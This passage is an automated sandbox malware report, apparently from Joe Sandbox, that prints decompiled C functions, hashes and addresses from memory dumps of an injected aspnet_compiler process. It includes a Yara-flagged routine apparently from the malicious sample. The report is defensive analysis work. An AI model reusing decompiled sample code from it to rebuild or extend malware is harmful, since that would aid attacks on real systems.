                                                  • Source File: 00000005.00000002.342566567.0000000001860000.00000040.00000800.00020000.00000000.sdmp, Offset: 01860000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_1860000_aspnet_compiler.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 8e8e2c3a6af46259b63c6c5bc466d60d4edf1a0701a37562cc333dc308e278d6
                                                  • Instruction ID: d47bd7bed565c0fbcb4cff01d97ef22fec4d001134d7b330507fc1222b8d7514
                                                  • Opcode Fuzzy Hash: 8e8e2c3a6af46259b63c6c5bc466d60d4edf1a0701a37562cc333dc308e278d6
                                                  • Instruction Fuzzy Hash: 2E417FB1A0022E9BDF24DF19CC88AA9B7F8EB56300F1841E9D919D7242E7749F80CF51
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 0194FDE2 Relevance: .1, Instructions: 116COMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 76%
                                                  			E0194FDE2(signed int* __ecx, signed int __edx, signed int _a4) {
				char _v8;
				signed int _v12;
				signed int _t29;
				char* _t32;
				char* _t43;
				signed int _t80;
				signed int* _t84;

				_push(__ecx);
				_push(__ecx);
				_t56 = __edx;
				_t84 = __ecx;
				_t80 = L0194FD4E(__ecx, __edx);
				_v12 = _t80;
				if(_t80 != 0) {
					_t29 =  *__ecx & _t80;
					_t74 = (_t80 - _t29 >> 4 << __ecx[1]) + _t29;
					if(__edx <= (_t80 - _t29 >> 4 << __ecx[1]) + _t29) {
						E01950A13(__ecx, _t80, 0, _a4);
						_t80 = 1;
						if(L018A7D50() == 0) {
							_t32 = 0x7ffe0380;
						} else {
							_t32 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
						}
						if( *_t32 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000001) != 0) {
							_push(3);
							L21:
							L01941608( *((intOrPtr*)(_t84 + 0x3c)), _t56);
						}
						goto L22;
					}
					if(( *(_t80 + 0xc) & 0x0000000c) != 8) {
						_t80 = E01952B28(__ecx[0xc], _t74, __edx, _a4,  &_v8);
						if(_t80 != 0) {
							_t66 =  *((intOrPtr*)(_t84 + 0x2c));
							_t77 = _v8;
							if(_v8 <=  *((intOrPtr*)( *((intOrPtr*)(_t84 + 0x2c)) + 0x28)) - 8) {
								E0194C8F7(_t66, _t77, 0);
							}
						}
					} else {
						_t80 = E0194DBD2(__ecx[0xb], _t74, __edx, _a4);
					}
					if(L018A7D50() == 0) {
						_t43 = 0x7ffe0380;
					} else {
						_t43 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
					}
					if( *_t43 == 0 || ( *( *[fs:0x30] + 0x240) & 0x00000001) == 0 || _t80 == 0) {
						goto L22;
					} else {
						_push((0 | ( *(_v12 + 0xc) & 0x0000000c) != 0x00000008) + 2);
						goto L21;
					}
				} else {
					_push(__ecx);
					_push(_t80);
					E0194A80D(__ecx[0xf], 9, __edx, _t80);
					L22:
					return _t80;
				}
			}










                                                  0x0194fde7
                                                  0x0194fde8
                                                  0x0194fdec
                                                  0x0194fdee
                                                  0x0194fdf5
                                                  0x0194fdf7
                                                  0x0194fdfc
                                                  0x0194fe19
                                                  0x0194fe22
                                                  0x0194fe26
                                                  0x0194fec6
                                                  0x0194fecd
                                                  0x0194fed5
                                                  0x0194fee7
                                                  0x0194fed7
                                                  0x0194fee0
                                                  0x0194fee0
                                                  0x0194feef
                                                  0x0194ff00
                                                  0x0194ff02
                                                  0x0194ff07
                                                  0x0194ff07
                                                  0x00000000
                                                  0x0194feef
                                                  0x0194fe33
                                                  0x0194fe55
                                                  0x0194fe59
                                                  0x0194fe5b
                                                  0x0194fe5e
                                                  0x0194fe69
                                                  0x0194fe6d
                                                  0x0194fe6d
                                                  0x0194fe69
                                                  0x0194fe35
                                                  0x0194fe41
                                                  0x0194fe41
                                                  0x0194fe79
                                                  0x0194fe8b
                                                  0x0194fe7b
                                                  0x0194fe84
                                                  0x0194fe84
                                                  0x0194fe93
                                                  0x00000000
                                                  0x0194fea8
                                                  0x0194feba
                                                  0x00000000
                                                  0x0194feba
                                                  0x0194fdfe
                                                  0x0194fe01
                                                  0x0194fe02
                                                  0x0194fe08
                                                  0x0194ff0c
                                                  0x0194ff14
                                                  0x0194ff14

                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.342566567.0000000001860000.00000040.00000800.00020000.00000000.sdmp, Offset: 01860000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_1860000_aspnet_compiler.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 3ef4319804cf21a17d71333ba11752c881d61f5af92be3a911c0d40f229f6d46
                                                  • Instruction ID: f54325ef42ae03456faeec0c28802af45b263a8c5f85e068ea56d7cd6acf8da8
                                                  • Opcode Fuzzy Hash: 3ef4319804cf21a17d71333ba11752c881d61f5af92be3a911c0d40f229f6d46
                                                  • Instruction Fuzzy Hash: 5331F432200642AFE332DB6CC844F6BBBE9EBC5752F184458E94E8B342DA75EC41C760
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 019522AE Relevance: .1, Instructions: 116COMMONCrypto
                                                  Download Yara Rule
                                                  C-Code - Quality: 100%
                                                  			E019522AE(void* __ecx, intOrPtr __edx, void* __eflags, signed int _a4, signed int _a8, char* _a12) {
				signed int _v8;
				signed int _v12;
				signed char _v16;
				signed int _v20;
				intOrPtr _v24;
				intOrPtr _v36;
				void* __ebx;
				void* __edi;
				signed char _t50;
				signed int _t53;
				void* _t63;
				signed char _t71;
				signed char _t75;
				signed int _t77;
				unsigned int _t106;
				void* _t114;
				signed int _t117;

				_v20 = _v20 & 0x00000000;
				_t117 = _a4;
				_t114 = __ecx;
				_v24 = __edx;
				E019521E8(_t117, __edx,  &_v16,  &_v12);
				if(_v24 != 0 && (_v12 | _v8) != 0) {
					_t71 =  !_v8;
					_v16 =  !_v12 >> 8 >> 8;
					_t72 = _t71 >> 8;
					_t50 = _v16;
					_t20 = (_t50 >> 8) + 0x186ac00; // 0x6070708
					_t75 = ( *((intOrPtr*)((_t71 >> 8 >> 8 >> 8) + 0x186ac00)) +  *((intOrPtr*)((_t71 >> 0x00000008 >> 0x00000008 & 0x000000ff) + 0x186ac00)) +  *((intOrPtr*)((_t71 & 0x000000ff) + 0x186ac00)) +  *((intOrPtr*)((_t72 & 0x000000ff) + 0x186ac00)) & 0x000000ff) + ( *_t20 +  *((intOrPtr*)((_t50 & 0x000000ff) + 0x186ac00)) +  *((intOrPtr*)((_t71 & 0x000000ff) + 0x186ac00)) +  *((intOrPtr*)((_t72 & 0x000000ff) + 0x186ac00)) & 0x000000ff);
					_v16 = _t75;
					if(( *(__ecx + 0x38) & 0x00000002) != 0) {
						L6:
						_t53 =  *0x1976110; // 0x6860035f
						 *_t117 = ( !_t53 ^  *_t117 ^ _t117) & 0x7fffffff ^  !_t53 ^ _t117;
						 *(_t117 + 4) = (_t117 - _v24 >> 0x0000000c ^  *0x1976110 ^ _t117) & 0x000000ff | 0x00000200;
						_t77 = _a8 & 0x00000001;
						if(_t77 == 0) {
							L0189FFB0(_t77, _t114, _t114);
						}
						_t63 = L01952FBD(_t114, _v24, _v12, _v8, _v16, 0);
						_v36 = 1;
						if(_t77 == 0) {
							E018A2280(_t63, _t114);
						}
						 *(_t117 + 4) =  *(_t117 + 4) & 0xfffffdff;
						 *_a12 = 0xff;
					} else {
						_t106 =  *(__ecx + 0x18) >> 7;
						if(_t106 <= 8) {
							_t106 = 8;
						}
						if( *((intOrPtr*)(_t114 + 0x1c)) + _t75 > _t106) {
							goto L6;
						}
					}
				}
				return _v20;
			}




















                                                  0x019522b9
                                                  0x019522c2
                                                  0x019522c6
                                                  0x019522c8
                                                  0x019522d8
                                                  0x019522e2
                                                  0x01952303
                                                  0x01952314
                                                  0x01952321
                                                  0x0195234a
                                                  0x0195235b
                                                  0x0195236c
                                                  0x01952372
                                                  0x01952376
                                                  0x0195238f
                                                  0x0195238f
                                                  0x019523b4
                                                  0x019523c6
                                                  0x019523c9
                                                  0x019523cc
                                                  0x019523cf
                                                  0x019523cf
                                                  0x019523e9
                                                  0x019523ee
                                                  0x019523f8
                                                  0x019523fb
                                                  0x019523fb
                                                  0x01952403
                                                  0x0195240a
                                                  0x01952378
                                                  0x0195237b
                                                  0x01952381
                                                  0x01952385
                                                  0x01952385
                                                  0x0195238d
                                                  0x00000000
                                                  0x00000000
                                                  0x0195238d
                                                  0x01952376
                                                  0x01952417

                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.342566567.0000000001860000.00000040.00000800.00020000.00000000.sdmp, Offset: 01860000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_1860000_aspnet_compiler.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 55d002000d658fb7aec2ecd580dffed31dbea0b1d674be89aab49d4e4e291740
                                                  • Instruction ID: 036289dab8c67bab6edcbcfbed5983f7a6acb87d532a92685236763509ea9a09
                                                  • Opcode Fuzzy Hash: 55d002000d658fb7aec2ecd580dffed31dbea0b1d674be89aab49d4e4e291740
                                                  • Instruction Fuzzy Hash: C141F4712043428BD308CF29C8A597ABBE5FF95726F04465DF8D99B3C2CA34D909C7A1
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 019520A8 Relevance: .1, Instructions: 114COMMONCrypto
                                                  Download Yara Rule
                                                  C-Code - Quality: 94%
                                                  			E019520A8(intOrPtr __ecx, intOrPtr __edx, signed int _a4, signed int* _a8) {
				intOrPtr _v8;
				intOrPtr _v12;
				signed int _v16;
				signed int _v20;
				signed int _t35;
				signed int _t57;
				unsigned int _t61;
				signed int _t63;
				signed int _t64;
				signed int _t73;
				signed int _t77;
				signed int _t80;
				signed int _t83;
				signed int _t84;
				unsigned int _t92;
				unsigned int _t97;
				signed int _t100;
				unsigned int _t102;

				_t79 = __edx;
				_t35 =  *0x1976110; // 0x6860035f
				_t57 = _a4;
				_v8 = __ecx;
				_t84 =  *_t57;
				_v12 = __edx;
				_t61 = _t84 ^ _t35 ^ _t57;
				_t83 = _t61 >> 0x00000001 & 0x00007fff;
				_v20 = _t83;
				 *_t57 = (_t84 ^ _t35 ^ _t57) & 0x7fffffff ^ _t35 ^ _t57;
				_t63 = _t61 >> 0x00000010 & 0x00007fff;
				if(_t63 != 0) {
					_t100 =  *0x1976110; // 0x6860035f
					_t77 = _t57 - (_t63 << 3);
					_v16 = _t77;
					_t102 = _t100 ^ _t77 ^  *_t77;
					_t106 = _t102;
					if(_t102 >= 0) {
						L01952E3F(_v8, __edx, _t106, _t77);
						_t57 = _v16;
						_t79 = _v12;
						_t83 = _t83 + (_t102 >> 0x00000001 & 0x00007fff);
					}
				}
				_t64 = _t57 + _t83 * 8;
				if(_t64 < _t79 + (( *(_t79 + 0x14) & 0x0000ffff) + 3) * 8) {
					asm("lfence");
					_t97 =  *_t64 ^  *0x1976110 ^ _t64;
					_t109 = _t97;
					if(_t97 >= 0) {
						L01952E3F(_v8, _t79, _t109, _t64);
						_t79 = _v12;
						_t83 = _t83 + (_t97 >> 0x00000001 & 0x00007fff);
					}
				}
				if(( *(_v8 + 0x38) & 0x00000001) != 0) {
					_t73 = _t57 + _t83 * 8;
					if(_t73 < _t79 + (( *(_t79 + 0x14) & 0x0000ffff) + 3) * 8) {
						asm("lfence");
						_t92 =  *_t73 ^  *0x1976110 ^ _t73;
						_t113 = _t92;
						if(_t92 >= 0) {
							L01952E3F(_v8, _t79, _t113, _t73);
							_t83 = _t83 + (_t92 >> 0x00000001 & 0x00007fff);
						}
					}
				}
				if(_v20 != _t83) {
					_t66 = _v12;
					_t80 = _t57 + _t83 * 8;
					 *_t57 =  *_t57 ^ (_t83 + _t83 ^  *_t57 ^  *0x1976110 ^ _t57) & 0x0000fffe;
					if(_t80 < _v12 + (( *(_t66 + 0x14) & 0x0000ffff) + 3) * 8) {
						 *_t80 =  *_t80 ^ (_t83 << 0x00000010 ^  *_t80 ^  *0x1976110 ^ _t80) & 0x7fff0000;
					}
				}
				 *_a8 = _t83;
				return _t57;
			}





















                                                  0x019520a8
                                                  0x019520b0
                                                  0x019520b6
                                                  0x019520ba
                                                  0x019520be
                                                  0x019520c4
                                                  0x019520cb
                                                  0x019520db
                                                  0x019520e4
                                                  0x019520e7
                                                  0x019520e9
                                                  0x019520ef
                                                  0x019520f1
                                                  0x019520fe
                                                  0x01952102
                                                  0x01952105
                                                  0x01952105
                                                  0x01952107
                                                  0x0195210d
                                                  0x01952112
                                                  0x01952115
                                                  0x01952120
                                                  0x01952120
                                                  0x01952107
                                                  0x01952126
                                                  0x01952131
                                                  0x01952133
                                                  0x0195213e
                                                  0x0195213e
                                                  0x01952140
                                                  0x01952146
                                                  0x0195214b
                                                  0x01952156
                                                  0x01952156
                                                  0x01952140
                                                  0x0195215f
                                                  0x01952165
                                                  0x01952170
                                                  0x01952172
                                                  0x0195217d
                                                  0x0195217d
                                                  0x0195217f
                                                  0x01952185
                                                  0x01952192
                                                  0x01952192
                                                  0x0195217f
                                                  0x01952170
                                                  0x01952197
                                                  0x01952199
                                                  0x019521a1
                                                  0x019521b1
                                                  0x019521bf
                                                  0x019521d6
                                                  0x019521d6
                                                  0x019521bf
                                                  0x019521dd
                                                  0x019521e5

                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.342566567.0000000001860000.00000040.00000800.00020000.00000000.sdmp, Offset: 01860000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_1860000_aspnet_compiler.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 4d5445737438312ffaac823e4ff9d1de5af37a0c3755033ca1f493a919f31849
                                                  • Instruction ID: ae72aee20657a654560abc42d336a7b20e130b0a67e2c96cc40f5a4713d36edc
                                                  • Opcode Fuzzy Hash: 4d5445737438312ffaac823e4ff9d1de5af37a0c3755033ca1f493a919f31849
                                                  • Instruction Fuzzy Hash: 7D41AC33E0442ACBCB18CF68D49157AB7B6FF8830576602BDDD09AB285DB34AD41CB90
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 01952D07 Relevance: .1, Instructions: 112COMMONCrypto
                                                  Download Yara Rule
                                                  C-Code - Quality: 100%
                                                  			E01952D07(void* __ecx, void* __edx, void* __eflags, signed short _a4) {
				char _v5;
				signed char _v12;
				signed int _v16;
				signed int _v20;
				signed int* _v24;
				signed int _t34;
				signed char _t40;
				signed int* _t49;
				signed int _t55;
				signed char _t57;
				signed char _t58;
				signed char _t59;
				signed short _t60;
				unsigned int _t66;
				unsigned int _t71;
				signed int _t77;
				signed char _t83;
				signed char _t84;
				signed int _t91;
				signed int _t93;
				signed int _t96;

				_t34 = E019521E8(_a4, __edx,  &_v24,  &_v20);
				_t83 =  !_v20;
				_t57 =  !_v16;
				_t84 = _t83 >> 8;
				_v12 = _t84 >> 8;
				_v5 =  *((intOrPtr*)((_t83 & 0x000000ff) + 0x186ac00)) +  *((intOrPtr*)((_t84 & 0x000000ff) + 0x186ac00));
				_t58 = _t57 >> 8;
				_t59 = _t58 >> 8;
				_t66 = _t59 >> 8;
				_t60 = _a4;
				_t13 = _t66 + 0x186ac00; // 0x6070708
				_t40 = _v12;
				_t71 = _t40 >> 8;
				_v12 = 0;
				_t17 = _t71 + 0x186ac00; // 0x6070708
				 *((intOrPtr*)(__ecx + 0x1c)) =  *((intOrPtr*)(__ecx + 0x1c)) + ( *_t13 +  *((intOrPtr*)((_t59 & 0x000000ff) + 0x186ac00)) +  *((intOrPtr*)((_t57 & 0x000000ff) + 0x186ac00)) +  *((intOrPtr*)((_t58 & 0x000000ff) + 0x186ac00)) & 0x000000ff) + ( *_t17 +  *((intOrPtr*)((_t40 & 0x000000ff) + 0x186ac00)) + _v5 & 0x000000ff);
				 *_t60 =  *_t60 ^ ( *_t60 ^  *0x1976110 ^ _t34 ^ _t60) & 0x00000001;
				_t49 = __ecx + 8;
				_t77 =  *_t60 & 0x0000ffff ^ _t60 & 0x0000ffff ^  *0x1976110 & 0x0000ffff;
				_t91 =  *_t49;
				_t96 = _t49[1] & 1;
				_v24 = _t49;
				if(_t91 != 0) {
					_t93 = _t77;
					L2:
					while(1) {
						if(_t93 < (_t91 - 0x00000004 & 0x0000ffff ^  *(_t91 - 4) & 0x0000ffff ^  *0x1976110 & 0x0000ffff)) {
							_t55 =  *_t91;
							if(_t96 == 0) {
								L11:
								if(_t55 == 0) {
									goto L13;
								} else {
									goto L12;
								}
							} else {
								if(_t55 == 0) {
									L13:
									_v12 = 0;
								} else {
									_t55 = _t55 ^ _t91;
									goto L11;
								}
							}
						} else {
							_t55 =  *(_t91 + 4);
							if(_t96 == 0) {
								L6:
								if(_t55 != 0) {
									L12:
									_t91 = _t55;
									continue;
								} else {
									goto L7;
								}
							} else {
								if(_t55 == 0) {
									L7:
									_v12 = 1;
								} else {
									_t55 = _t55 ^ _t91;
									goto L6;
								}
							}
						}
						goto L14;
					}
				}
				L14:
				_t29 = _t60 + 4; // 0x4
				return E0189B090(_v24, _t91, _v12, _t29);
			}
























                                                  0x01952d1f
                                                  0x01952d2c
                                                  0x01952d31
                                                  0x01952d33
                                                  0x01952d42
                                                  0x01952d4b
                                                  0x01952d51
                                                  0x01952d5d
                                                  0x01952d62
                                                  0x01952d6e
                                                  0x01952d71
                                                  0x01952d7d
                                                  0x01952d87
                                                  0x01952d8d
                                                  0x01952d91
                                                  0x01952da5
                                                  0x01952db7
                                                  0x01952dc8
                                                  0x01952dcf
                                                  0x01952dd1
                                                  0x01952dd3
                                                  0x01952dd6
                                                  0x01952ddb
                                                  0x01952ddd
                                                  0x00000000
                                                  0x01952ddf
                                                  0x01952df5
                                                  0x01952e0e
                                                  0x01952e12
                                                  0x01952e1a
                                                  0x01952e1c
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x01952e14
                                                  0x01952e16
                                                  0x01952e22
                                                  0x01952e22
                                                  0x01952e18
                                                  0x01952e18
                                                  0x00000000
                                                  0x01952e18
                                                  0x01952e16
                                                  0x01952df7
                                                  0x01952df7
                                                  0x01952dfc
                                                  0x01952e04
                                                  0x01952e06
                                                  0x01952e1e
                                                  0x01952e1e
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x01952dfe
                                                  0x01952e00
                                                  0x01952e08
                                                  0x01952e08
                                                  0x01952e02
                                                  0x01952e02
                                                  0x00000000
                                                  0x01952e02
                                                  0x01952e00
                                                  0x01952dfc
                                                  0x00000000
                                                  0x01952df5
                                                  0x01952ddf
                                                  0x01952e26
                                                  0x01952e26
                                                  0x01952e3c

                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.342566567.0000000001860000.00000040.00000800.00020000.00000000.sdmp, Offset: 01860000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_1860000_aspnet_compiler.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 5cf6cb3554efe69bcf7aa26766ac8a38dde7eb69e98f9affe4e3e447d77c1720
                                                  • Instruction ID: 7c3813e5b020a3e9c66ed66c92688dba61a2cc58e2ca5efd94ac17ea918eaa9c
                                                  • Opcode Fuzzy Hash: 5cf6cb3554efe69bcf7aa26766ac8a38dde7eb69e98f9affe4e3e447d77c1720
                                                  • Instruction Fuzzy Hash: 2F4159716002558BD745CF29C8D06BABFF4FF85302F0941A6DC85EB246DA35D50AD360
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 0194EA55 Relevance: .1, Instructions: 111COMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 70%
                                                  			E0194EA55(intOrPtr* __ecx, char __edx, signed int _a4) {
				signed int _v8;
				char _v12;
				intOrPtr _v15;
				char _v16;
				intOrPtr _v19;
				void* _v28;
				intOrPtr _v36;
				void* __ebx;
				void* __edi;
				signed char _t26;
				signed int _t27;
				char* _t40;
				unsigned int* _t50;
				intOrPtr* _t58;
				unsigned int _t59;
				char _t75;
				signed int _t86;
				intOrPtr _t88;
				intOrPtr* _t91;

				_t75 = __edx;
				_t91 = __ecx;
				_v12 = __edx;
				_t50 = __ecx + 0x30;
				_t86 = _a4 & 0x00000001;
				if(_t86 == 0) {
					E018A2280(_t26, _t50);
					_t75 = _v16;
				}
				_t58 = _t91;
				_t27 = E0194E815(_t58, _t75);
				_v8 = _t27;
				if(_t27 != 0) {
					E0188F900(_t91 + 0x34, _t27);
					if(_t86 == 0) {
						L0189FFB0(_t50, _t86, _t50);
					}
					_push( *((intOrPtr*)(_t91 + 4)));
					_push( *_t91);
					_t59 =  *(_v8 + 0x10);
					_t53 = 1 << (_t59 >> 0x00000002 & 0x0000003f);
					_push(0x8000);
					_t11 = _t53 - 1; // 0x0
					_t12 = _t53 - 1; // 0x0
					_v16 = ((_t59 >> 0x00000001 & 1) + (_t59 >> 0xc) << 0xc) - 1 + (1 << (_t59 >> 0x00000002 & 0x0000003f)) - (_t11 + ((_t59 >> 0x00000001 & 1) + (_t59 >> 0x0000000c) << 0x0000000c) & _t12);
					L0194AFDE( &_v12,  &_v16);
					asm("lock xadd [eax], ecx");
					asm("lock xadd [eax], ecx");
					L0194BCD2(_v8,  *_t91,  *((intOrPtr*)(_t91 + 4)));
					_t55 = _v36;
					_t88 = _v36;
					if(L018A7D50() == 0) {
						_t40 = 0x7ffe0388;
					} else {
						_t55 = _v19;
						_t40 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
					}
					if( *_t40 != 0) {
						L0193FE3F(_t55, _t91, _v15, _t55);
					}
				} else {
					if(_t86 == 0) {
						L0189FFB0(_t50, _t86, _t50);
						_t75 = _v16;
					}
					_push(_t58);
					_t88 = 0;
					_push(0);
					E0194A80D(_t91, 8, _t75, 0);
				}
				return _t88;
			}






















                                                  0x0194ea55
                                                  0x0194ea66
                                                  0x0194ea68
                                                  0x0194ea6c
                                                  0x0194ea6f
                                                  0x0194ea72
                                                  0x0194ea75
                                                  0x0194ea7a
                                                  0x0194ea7a
                                                  0x0194ea7e
                                                  0x0194ea80
                                                  0x0194ea85
                                                  0x0194ea8b
                                                  0x0194eab5
                                                  0x0194eabc
                                                  0x0194eabf
                                                  0x0194eabf
                                                  0x0194eaca
                                                  0x0194eace
                                                  0x0194ead0
                                                  0x0194eae4
                                                  0x0194eaeb
                                                  0x0194eaf0
                                                  0x0194eaf5
                                                  0x0194eb09
                                                  0x0194eb0d
                                                  0x0194eb1d
                                                  0x0194eb2d
                                                  0x0194eb38
                                                  0x0194eb3d
                                                  0x0194eb41
                                                  0x0194eb4a
                                                  0x0194eb60
                                                  0x0194eb4c
                                                  0x0194eb52
                                                  0x0194eb59
                                                  0x0194eb59
                                                  0x0194eb68
                                                  0x0194eb71
                                                  0x0194eb71
                                                  0x0194ea8d
                                                  0x0194ea8f
                                                  0x0194ea92
                                                  0x0194ea97
                                                  0x0194ea97
                                                  0x0194ea9b
                                                  0x0194ea9c
                                                  0x0194ea9e
                                                  0x0194eaa6
                                                  0x0194eaa6
                                                  0x0194eb7e

                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.342566567.0000000001860000.00000040.00000800.00020000.00000000.sdmp, Offset: 01860000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_1860000_aspnet_compiler.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: f5f831e91637f778ab1786019c0fe1c1c634a5059deceac50859eb6d9a86e6aa
                                                  • Instruction ID: 62c2dc15462a78c87cc410571c08d82cafeeab05e952f2850e9d930928ee9b3f
                                                  • Opcode Fuzzy Hash: f5f831e91637f778ab1786019c0fe1c1c634a5059deceac50859eb6d9a86e6aa
                                                  • Instruction Fuzzy Hash: 4531C1326047069BD729DF28C880E6BB7AAFBC0310F04492DE55A87741DE34E909CBA6
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00401030 Relevance: .1, Instructions: 108COMMONCrypto
                                                  Download Yara Rule
                                                  C-Code - Quality: 100%
                                                  			E00401030(signed char* __eax) {
				signed char* _t37;
				unsigned int _t65;
				unsigned int _t73;
				unsigned int _t81;
				unsigned int _t88;
				signed char _t94;
				signed char _t97;
				signed char _t100;

				_t37 = __eax;
				_t65 = ((((__eax[0xc] & 0x000000ff) << 0x00000008 | __eax[0xd] & 0x000000ff) & 0x0000ffff) << 0x00000008 | __eax[0xe] & 0xff) << 0x00000007 | (__eax[0xf] & 0x000000ff) >> 0x00000001;
				_t94 = __eax[0xb];
				if((_t94 & 0x00000001) != 0) {
					_t65 = _t65 | 0x80000000;
				}
				_t37[0xc] = _t65 >> 0x18;
				_t37[0xf] = _t65;
				_t37[0xd] = _t65 >> 0x10;
				_t73 = ((((_t37[8] & 0x000000ff) << 0x00000008 | _t37[9] & 0x000000ff) & 0x0000ffff) << 0x00000008 | _t37[0xa] & 0xff) << 0x00000007 | (_t94 & 0x000000ff) >> 0x00000001;
				_t97 = _t37[7];
				_t37[0xe] = _t65 >> 8;
				if((_t97 & 0x00000001) != 0) {
					_t73 = _t73 | 0x80000000;
				}
				_t37[8] = _t73 >> 0x18;
				_t37[0xb] = _t73;
				_t37[9] = _t73 >> 0x10;
				_t81 = ((((_t37[4] & 0x000000ff) << 0x00000008 | _t37[5] & 0x000000ff) & 0x0000ffff) << 0x00000008 | _t37[6] & 0xff) << 0x00000007 | (_t97 & 0x000000ff) >> 0x00000001;
				_t100 = _t37[3];
				_t37[0xa] = _t73 >> 8;
				if((_t100 & 0x00000001) != 0) {
					_t81 = _t81 | 0x80000000;
				}
				_t37[4] = _t81 >> 0x18;
				_t37[7] = _t81;
				_t37[5] = _t81 >> 0x10;
				_t88 = (((_t37[1] & 0x000000ff) << 0x00000008 | _t37[2] & 0x000000ff) & 0x00ffffff | ( *_t37 & 0x000000ff) << 0x00000010) << 0x00000007 | (_t100 & 0x000000ff) >> 0x00000001;
				 *_t37 = _t88 >> 0x18;
				_t37[1] = _t88 >> 0x10;
				_t37[6] = _t81 >> 8;
				_t37[2] = _t88 >> 8;
				_t37[3] = _t88;
				return _t37;
			}











                                                  0x00401030
                                                  0x0040105b
                                                  0x0040105d
                                                  0x00401063
                                                  0x00401065
                                                  0x00401065
                                                  0x00401071
                                                  0x00401076
                                                  0x0040107c
                                                  0x004010ac
                                                  0x004010ae
                                                  0x004010b4
                                                  0x004010ba
                                                  0x004010bc
                                                  0x004010bc
                                                  0x004010cb
                                                  0x004010d0
                                                  0x004010d6
                                                  0x00401101
                                                  0x00401103
                                                  0x00401109
                                                  0x0040110f
                                                  0x00401111
                                                  0x00401111
                                                  0x00401120
                                                  0x00401128
                                                  0x0040112b
                                                  0x0040114f
                                                  0x00401156
                                                  0x0040115d
                                                  0x00401169
                                                  0x0040116c
                                                  0x0040116f
                                                  0x00401173

                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.341848182.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_400000_aspnet_compiler.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: a4f1a47e469db01a1eef6c7f2d5b49e19d955ffd97c7228385fc8c35807cfa85
                                                  • Instruction ID: 9ce4faf4bd6c29c48d5e9242fd1ccb7de96948774e055271f7c113e60250bd75
                                                  • Opcode Fuzzy Hash: a4f1a47e469db01a1eef6c7f2d5b49e19d955ffd97c7228385fc8c35807cfa85
                                                  • Instruction Fuzzy Hash: 203180116596F10ED30E836D08BDA75AEC18E9720174EC2FEDADA6F2F3C0888408D3A5
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 019069A6 Relevance: .1, Instructions: 108COMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 69%
                                                  			E019069A6(signed short* __ecx, void* __eflags) {
				signed int _v8;
				signed int _v16;
				intOrPtr _v20;
				signed int _v24;
				signed short _v28;
				signed int _v32;
				intOrPtr _v36;
				signed int _v40;
				char* _v44;
				signed int _v48;
				intOrPtr _v52;
				signed int _v56;
				char _v60;
				signed int _v64;
				char _v68;
				char _v72;
				signed short* _v76;
				signed int _v80;
				char _v84;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t68;
				intOrPtr _t73;
				signed short* _t74;
				void* _t77;
				void* _t78;
				signed int _t79;
				signed int _t80;

				_v8 =  *0x197d360 ^ _t80;
				_t75 = 0x100;
				_v64 = _v64 & 0x00000000;
				_v76 = __ecx;
				_t79 = 0;
				_t68 = 0;
				_v72 = 1;
				_v68 =  *((intOrPtr*)( *[fs:0x18] + 0x20));
				_t77 = 0;
				if(L01896C59(__ecx[2], 0x100, __eflags) != 0) {
					_t79 =  *((intOrPtr*)( *[fs:0x30] + 0x1e8));
					if(_t79 != 0 && E01906BA3() != 0) {
						_push(0);
						_push(0);
						_push(0);
						_push(0x1f0003);
						_push( &_v64);
						if(E018C9980() >= 0) {
							E018A2280(_t56, 0x1978778);
							_t77 = 1;
							_t68 = 1;
							if( *0x1978774 == 0) {
								asm("cdq");
								 *(_t79 + 0xf70) = _v64;
								 *(_t79 + 0xf74) = 0x100;
								_t75 = 0;
								_t73 = 4;
								_v60 =  &_v68;
								_v52 = _t73;
								_v36 = _t73;
